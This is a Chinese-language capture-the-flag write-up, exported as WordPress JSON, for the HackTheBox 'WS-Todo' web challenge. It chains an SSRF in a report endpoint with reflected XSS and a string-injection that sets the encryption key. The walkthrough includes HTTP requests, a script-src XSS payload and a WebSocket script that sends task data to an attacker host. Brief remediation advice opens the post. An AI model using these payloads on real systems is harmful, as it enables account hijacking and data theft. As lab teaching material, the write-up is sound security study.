{"id":1084,"date":"2024-01-07T21:03:47","date_gmt":"2024-01-07T13:03:47","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1084"},"modified":"2024-03-16T16:29:59","modified_gmt":"2024-03-16T08:29:59","slug":"htb-ws-todo","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1084","title":{"rendered":"HTB WS-Todo"},"content":{"rendered":"<figure style=\"aspect-ratio:16\/9;\" class=\"wp-block-post-featured-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/wp.fifu.app\/systw.net\/aHR0cHM6Ly9pLmltZ3VyLmNvbS82b1JZMHNkLmpwZw\/049ea6bdfe90\/htb-ws-todo.webp?w=1024&amp;h=1024&amp;c=0&amp;p=1084\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"HTB WS-Todo\" title=\"HTB WS-Todo\" style=\"width:100%;height:100%;object-fit:cover;\" \/><\/figure>\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u76ee\u6a19\u8aaa\u660e<\/h3>\n\n\n\n<p>hackthebox\u4e0a\u7684web\u9776\u6a5f\uff0c\u540d\u7a31\u70ba<code>ws-todo<\/code>\uff0c\u60c5\u5883\u662fwebsocket\u4efb\u52d9\u7ba1\u7406\u7cfb\u7d71<\/p>\n\n\n\n<p>\u76ee\u6a19\u7e3d\u5171\u6709\u5169\u53f0\u4f3a\u670d\u5668\uff0c\u4e00\u53f0\u904b\u884cnode.js\uff0c\u53e6\u4e00\u53f0\u904b\u884cPHP\u3002<br>Node.js \u4f3a\u670d\u5668\u5c07\u7a31\u70ba todo\uff0cPHP \u4f3a\u670d\u5668\u5c07\u7a31\u70ba htmltester\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b89\u5168\u98a8\u96aa<\/h3>\n\n\n\n<p>\u6b64\u76ee\u6a19\u767c\u73fe4\u500b\u5b89\u5168\u98a8\u96aa<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>todo\u670d\u52d9\u5668\u7684report\u63a5\u53e3\u6709SSRF\u554f\u984c<\/li>\n\n\n\n<li>todo\u670d\u52d9\u5668\u7684\u5bc6\u9470\u53ef\u88ab\u63a7\u5236<\/li>\n\n\n\n<li>htmltester\u670d\u52d9\u5668index.php\u6709xss\u554f\u984c<\/li>\n\n\n\n<li>\u56b4\u683c\u6a21\u5f0f\u88ab\u95dc\u9589\uff0c\u6578\u64da\u5eab\u5141\u8a31\u5132\u5b58\u904e\u9577\u7684\u5b57\u4e32<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fdd\u8b77\u6a5f\u5236<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>flag\u88ab\u52a0\u5bc6<\/li>\n\n\n\n<li>\u7121\u6cd5\u57f7\u884c\u5176\u4ed6\u4f86\u6e90\u7684\u8acb\u6c42\uff0cCSRF\u653b\u64ca\u6c92\u7528<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b89\u5168\u512a\u5316\u5efa\u8b70&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6aa2\u67e5\u7db2\u7ad9\u7684\u67b6\u69cb\u662f\u5426\u6709SSRF\u7684\u6f0f\u6d1e<\/li>\n\n\n\n<li>\u6aa2\u67e5\u76f8\u95dc\u7db2\u7ad9\u662f\u5426\u6709XSS\u6f0f\u6d1e<\/li>\n\n\n\n<li>\u6aa2\u67e5nodejs\u4f7f\u7528\u7684\u53cd\u5f15\u865f\u662f\u5426\u80fd\u6539\u8b8a\u7a0b\u5f0f\u884c\u70ba<\/li>\n\n\n\n<li>\u6578\u64da\u5eab\u958b\u555f\u56b4\u683c\u5f0f\u6a21\u5f0f<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u653b\u64ca\u624b\u6cd5<\/h2>\n\n\n\n<p>\u5206\u6790todo\u670d\u52d9\u5668\u7684\u4ee5\u4e0bwsHandler.js\u4ee3\u78bc\u53ef\u4ee5\u767c\u73fe\uff0cflag\u5728userID=1\u7684\u6642\u5019\u6703\u986f\u793a\uff0cuserID=1\u4ee3\u8868\u5fc5\u9808admin\u767b\u5165\uff0c\u56e0\u6b64\u8981\u60f3\u8fa6\u6cd5\u7528admin\u7684\u8eab\u4efd\u5728websocket\u767c\u9001get\u52d5\u4f5c\u62ff\u5230flag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>...omit...\nelse if (data.action === 'get') {\n            try {\n                const results = await db.getTasks(userId);\n                const tasks = &#91;];\n                for (const result of results) {\n\n                    let quote;\n\n                    if (userId === 1) {\n                        quote = `A wise man once said, \"the flag is ${process.env.FLAG}\".`;\n...omit...\n<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">TODO server\u4f7f\u7528SSRF <\/h3>\n\n\n\n<p>\u5206\u6790\u4ee3\u78bc\u5f8c\u767c\u73fe\u9019\u88e1\u6709SSRF\u6f0f\u6d1e\uff0c\u7576TODO\u670d\u52d9\u5668\u8acb\u6c42report\u8def\u7531\u6642\uff0c\u670d\u52d9\u7aef\u7684puppeteer\u6703\u7528admin\u8eab\u4efd\u53bb\u8a2a\u554f\u8acb\u6c42\u4e2d\u7684url<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ routes\/index.js\n\/\/ Report any suspicious activity to the admin!\nrouter.post('\/report', doReportHandler);<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ util\/report.js\nconst doReportHandler = async (req, res) =&gt; {\n    if (!browser) {\n        console.log('&#91;INFO] Starting browser')\n        browser = await puppeteer.launch({\n    ...omit...\n    const url = req.body.url\n    ...omit...\n    await visit(url)\n    ...omit...\n}<\/code><\/pre>\n\n\n\n<p>\u5728report.js\u88e1\uff0c\u8a2a\u554f\u4efb\u610f\u9801\u9762\u90fd\u6703\u767b\u5165admin\u5e33\u6236<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/ util\/report.js\n...omit...\nconst visit = async (url) =&gt; {\n    const ctx = await browser.createIncognitoBrowserContext()\n    const page = await ctx.newPage()\n\n    await page.goto(LOGIN_URL, { waitUntil: 'networkidle2' })\n    await page.waitForSelector('form')\n    await page.type('wired-input&#91;name=username]', process.env.USERNAME)\n    await page.type('wired-input&#91;name=password]', process.env.PASSWORD)\n    await page.click('wired-button')\n...omit...<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ef\u4ee5\u53ef\u4ee5\u900f\u904e\u5982\u4e0b\u8acb\u6c42\u767c\u52d5SSRF\u653b\u64ca\uff0c\u8b93\u76ee\u6a19\u670d\u52d9\u5668\u5b58\u53d6\u5167\u7db2\u7684\u7db2\u5740<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/report HTTP\/1.1\nHost: 167.99.82.136:31836\nContent-Length: 116\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.6099.71 Safari\/537.36\nContent-Type: application\/json\nAccept: *\/*\nOrigin: http:\/\/167.99.82.136:31836\nReferer: http:\/\/167.99.82.136:31836\/\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nCookie: connect.sid=s%3AN9JVoeONBaLeHgUFCsqsakes8hMykHv_.xmv7VsgbfcSyhBWmZ%2B12DDUqhN32C%2FqSneKOJV%2Bgy2w\nConnection: close\n\n{\n\"url\": \"http:\/\/127.0.0.1:8080\/index.php\"\n}<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">htmltester server\u4f7f\u7528XSS<\/h3>\n\n\n\n<p>\u4ee3\u78bc\u6aa2\u67e5\u6642\u767c\u73fehtmltester\u670d\u52a1\u5668\u7684index.php\u5167\u7684<code>$_GET['html']<\/code>\u6c92\u6709\u505a\u904e\u6ffe<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;html&gt;\n    &lt;body&gt;\n        &lt;?php if (isset($_GET&#91;'html'])): ?&gt;\n            &lt;?php echo $_GET&#91;'html']; ?&gt;\n        &lt;?php else: ?&gt;\n            &lt;h1&gt;HTML Tester&lt;\/h1&gt;\n            &lt;p&gt;Internal development tool&lt;\/p&gt;\n            &lt;form action=\"index.php\" method=\"get\"&gt;\n                &lt;input type=\"text\" name=\"html\" \/&gt;\n                &lt;input type=\"submit\" value=\"Submit\" \/&gt;\n            &lt;\/form&gt;\n        &lt;?php endif; ?&gt;\n    &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<p>\u7d93\u904e\u6e2c\u8a66\u767c\u73fe\u53ef\u4ee5\u89f8\u767cXSS\u653b\u64ca<\/p>\n\n\n\n<p><code>http:\/\/htmltester:30785\/index.php?html=&lt;script&gt;alert(1)&lt;\/script&gt;<\/code><\/p>\n\n\n\n<p>\u4f46\u76f4\u63a5\u7528XSS\u653b\u64ca\u662f\u6c92\u7528\u7684\uff0c\u56e0\u70ba\u53ea\u6703\u5728htmltester\u670d\u52d9\u5668\u6709\u4f5c\u7528\uff0c\u53e6\u5916\u5728antiCSRFMiddleware.js\u9019\u908a\u505a\u4fdd\u8b77\u4e5f\u7121\u6cd5\u57f7\u884cCSRF<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const antiCSRFMiddleware = (req, res, next) =&gt; {\n    const referer = (req.headers.referer? new URL(req.headers.referer).host : req.headers.host);\n    const origin = (req.headers.origin? new URL(req.headers.origin).host : null);\n  \n    if (req.headers.host === (origin || referer)) {\n      next();\n    } else {\n      return res.status(403).json({ error: 'CSRF detected' });\n    }\n};<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u900f\u904eSSRF\u57f7\u884cXSS<\/h3>\n\n\n\n<p>\u53e6\u5916\u6e96\u5099\u4e00\u53f0\u653b\u64ca\u7528\u7684\u4e3b\u6a5f hackervps\uff0c\u5728\u642d\u914dssrf\u6f0f\u6d1e\u53ef\u4ee5\u7528\u7ba1\u7406\u54e1\u8eab\u4efd\u9032\u884cxss\u653b\u64ca\uff0c\u53ea\u8981\u5c07\u4ee5\u4e0b XSS payload\u50b3\u9001report\u5c31\u80fd\u89f8\u767c\u5167\u90e8\u4ee3\u78bc\u6a5f\u5236\u7531admin\u57f7\u884c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\nPOST \/report HTTP\/1.1\n...omit...\n\n{\n\"url\": \"http:\/\/127.0.0.1:8080\/index.php?html=%3Cscript%20src=%22http:\/\/hackervps\/attack.js%22%3E%3C\/script%3E\"\n}<\/code><\/pre>\n\n\n\n<p>\u56e0\u70bareport\u8b80\u53d6\u7db2\u9801\u6703\u7528admin\uff0c\u6240\u4ee5\u6703\u7528admin\u53bb\u57f7\u884chackervps\u4e3b\u6a5f\u4e0a\u7684\u653b\u64ca\u8173\u672c,attack.js \u7684\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const ws = new WebSocket('ws:\/\/127.0.0.1\/ws');\nws.onopen = () =&gt; {\n    ws.send(JSON.stringify({ action: 'add' }))\n    ws.send(JSON.stringify({ action: 'get' }))\n}\n\nws.onmessage = async (msg) =&gt; {\n    const data = JSON.parse(msg.data);\n    if (data.success) {\n        if (data.action === 'get') {\n            fetch(\"http:\/\/hackervps\/\" + JSON.stringify(data.tasks ))\n        }\n        else if (data.action === 'add') {\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<p>\u6574\u500b\u6d41\u7a0b\u662f\uff0creport\u63a5\u53d7\u8acb\u6c42\u5f8c\uff0c\u4ee3\u78bc\u5167\u7684puppeteer\u6703\u767b\u5165admin\u5e33\u6236\u8a2a\u554f\u6211\u5011\u50b3\u5165\u7684URL\uff0c\u7136\u5f8c\u8f09\u5165attack.js\uff0c\u4e26\u57f7\u884cwebsocket\u7684\u9023\u63a5\u7136\u5f8c\u767c\u6d88\u606f\uff0c\u6700\u5f8c\u5728hackervps\u4e3b\u6a5f\u62ff\u5230flag\u5982\u4e0b\uff0c\u4f46\u9019\u500bflag\u88ab\u52a0\u5bc6\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>167.99.82.136 - - &#91;07\/Jan\/2024:12:33:21 +0000] \"GET \/ctf?&#91;{%22title%22:{%22iv%22:%220e2d754664b9a107f86566646acfe885%22,%22content%22:%2260270eaaac\n78758442%22},%22description%22:{%22iv%22:%22620944136fbe0f54bfcc5f2f0d0cfe78%22,%22content%22:%22272bfbd23fd9538edb%22},%22quote%22:{%22iv%22:%223c\nc783e9d35cee00d546da87c2b93329%22,%22content%22:%22b5752f14054d881bd4f5cf17d51ebe04655c1b7482b883cc7fa86c1f46ac6fede88d754596496c854404859b805249b3\n8872f43f5c5e45ed97e67c759c08d9%22}}] HTTP\/1.1\" 404 4789 \"http:\/\/127.0.0.1:8080\/\" \"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like G\necko) HeadlessChrome\/101.0.4950.0 Safari\/537.36\"<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5f9ewsHandler.js\u4ee3\u78bc\u4e2d\u53ef\u4ee5\u770b\u5230\uff0c\u5fc5\u9808\u5c0d\u52a0\u5bc6\u7684\u5167\u5bb9<code>quote<\/code>\u9032\u884c\u89e3\u5bc6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>                    if (userId === 1) {\n                        quote = `A wise man once said, \"the flag is ${process.env.FLAG}\".`;\n                 ...OMIT...\n                            quote: encrypt(quote, task.secret)\n                        });<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u63a7\u5236\u5bc6\u9470<\/h3>\n\n\n\n<p>\u5728wsHandler.js\u4ee3\u78bc\u4e2d\u767c\u73fenodejs\u6709\u4e00\u6bb5\u4ee3\u78bc\u4f7f\u7528\u53cd\u5f15\u865f\uff0c\u9019\u500b\u53ef\u4ee5\u76f4\u63a5\u7522\u751f\u5b57\u4e32\uff0c\u800c\u4e14\u9019\u500b\u5b57\u4e32\u76f4\u63a5\u88ab\u63d2\u5165\u4e86\u8cc7\u6599\u5eab<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/wsHandler.js\nawait db.addTask(userId, `{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`);\n...omit...\nconst task = JSON.parse(result.data);<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/\/database.js\nasync addTask(userId, data) {\n    const result = await this.query('INSERT INTO todos (user_id, data) VALUES (?, ?)', &#91;userId, data]);\n    return result;\n}<\/code><\/pre>\n\n\n\n<p>\u9019\u88e1\u53ef\u4ee5\u63a7\u5236description\u7684\u503c\u8b8a\u6210\u6211\u5011\u60f3\u8981\u7684\u5167\u5bb9<\/p>\n\n\n\n<p>\u539f\u672c\u4ee3\u78bc\u683c\u5f0f\u5982\u4e0b<br><code>`{\"title\":\"${data.title}\",\"description\":\"${data.description}\",\"secret\":\"${secret}\"}`<\/code><\/p>\n\n\n\n<p>\u6b63\u5e38\u8f38\u5165\u5167\u5bb9<code>title: 'A', description: 'AAA',<\/code><\/p>\n\n\n\n<p>\u4ee3\u78bc\u5167\u5bb9\u6703\u8b8a\u6210<code>{\"title\":\"A\",\"description\":\"AAA\",\"secret\":\"${secret}\"}<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u7570\u5e38\u8f38\u5165\u5167\u5bb9 <code>title: 'A', description: `AAA...\",\"secret\":\"00000000000000000000000000000000\"}`<\/code><\/p>\n\n\n\n<p>\u4ee3\u78bc\u5167\u5bb9\u6703\u8b8a\u6210 <code>{\"title\":\"A\",\"description\":\"AAA...\",\"secret\":\"00000000000000000000000000000000\"}\",\"secret\":\"${secret}\"}<\/code><\/p>\n\n\n\n<p>\u4f46\u7531\u65bcdata\u53ea\u9650\u5236255\u500b\u5b57\u5143,\u6240\u4ee5\u9032\u8cc7\u6599\u5eab\u8b8a\u6210 <code>{\"title\":\"A\",\"description\":\"AAA...\",\"secret\":\"00000000000000000000000000000000\"}<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5728\u52a0\u4e0a\u5f9e\u4ee5\u4e0b\u7684supervisord.conf\u767c\u73fe\uff0c\u76ee\u524dmysql\u4e0d\u662f\u56b4\u683c\u6a21\u5f0f\uff0c\u6240\u4ee5\u8d85\u904e255\u500b\u5b57\u5143\u9084\u662f\u80fd\u63d2\u5165<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;program:mysql]\n# Set MySQL modes: https:\/\/dev.mysql.com\/doc\/refman\/8.0\/en\/sql-mode.html\ncommand=\/usr\/bin\/pidproxy \/var\/run\/mysqld\/mysqld.pid \/usr\/sbin\/mysqld --sql-mode=\"NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_ENGINE_SUBSTITUTION\"\nautorestart=true<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u586b\u5145\u5783\u573e\u6578\u64da\u7684\u65b9\u5f0f\uff0c\u8b93\u5bc6\u9470\u53ef\u63a7<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8abf\u6574\u653b\u64ca\u8173\u672c<\/h3>\n\n\n\n<p>\u8abf\u6574\u653b\u64ca\u8173\u672c,\u5728action:&#8217;add&#8217;\u5f8c\u589e\u52a0<code>title: 'A',description: `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"secret\":\"00000000000000000000000000000000\"}`<\/code>\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>const ws = new WebSocket(`ws:\/\/127.0.0.1\/ws`);\nws.onopen = () =&gt; {\n    ws.send(JSON.stringify({action:'add',title: 'A',description: `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\",\"secret\":\"00000000000000000000000000000000\"}`}));\n    ws.send(JSON.stringify({action:'get' }))\n}\nws.onmessage = async (msg) =&gt; {\n    const data = JSON.parse(msg.data);\n    if (data.success) {\n        if (data.action === 'get') {\n            fetch(\"http:\/\/hackervps\/\" + JSON.stringify(data.tasks ))\n        }\n        else if (data.action === 'add') {\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<p>\u6539\u8b8a\u653b\u64ca\u8173\u672c\u5728\u57f7\u884c\u4e00\u6b21\uff0c \u7136\u5f8c\u56de\u5230hackervps\u4e3b\u6a5f\u53d6\u5f97\u7684\u52a0\u5bc6flag\uff0c\u628aquote\u7684iv\u7684content\u53d6\u51fa\uff0c\u8abf\u7528decrpy\u63a5\u53e3\u642d\u914d\u6211\u5011\u81ea\u8a02\u7684\u5bc6\u947000000000000000000000000000000000\u4f86\u89e3\u5bc6\u5982\u4e0b\uff0c\u5c31\u80fd\u5f97\u5230flag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/decrypt HTTP\/1.1\n...omit...\n\n{\"cipher\":{\"iv\":\"1c628adf9afda2df908a48f35cfa268c\",\"content\":\"40017107d5b89ed7081c1d5b04c26141718cb8990858bb1cfde36e8f9753e43aba190eb68b9a83a02d2eb5de4c16c27a61ce9e659c78711c470ea26460c3a9\"},\"secret\":\"00000000000000000000000000000000\"}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u900f\u904eSSRF\u8a2a\u554f\u6709XSS\u5f31\u9ede\u7684\u9801\u9762\uff0c\u8f09\u5165\u60e1\u610f\u4ee3\u78bc\u4ee3\u78bc\u53d6\u5f97\u52a0\u5bc6\u4fe1\u606f\uff0c\u5728\u900f\u904e\u8f38\u5165\u8d85\u9577\u5167\u5bb9\u5c0e\u81f4\u5bc6\u9470\u53ef\u63a7\uff0c\u4ee5\u89e3\u958b\u52a0\u5bc6\u4fe1\u606f<\/p>\n","protected":false},"author":1,"featured_media":1390,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/i.imgur.com\/6oRY0sd.jpg","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[27],"tags":[43,46,41],"class_list":["post-1084","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackerskill","tag-ssrf","tag-websocket","tag-xss"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/i.imgur.com\/6oRY0sd.jpg?fit=1024%2C1024&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1084"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1084\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media\/1390"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}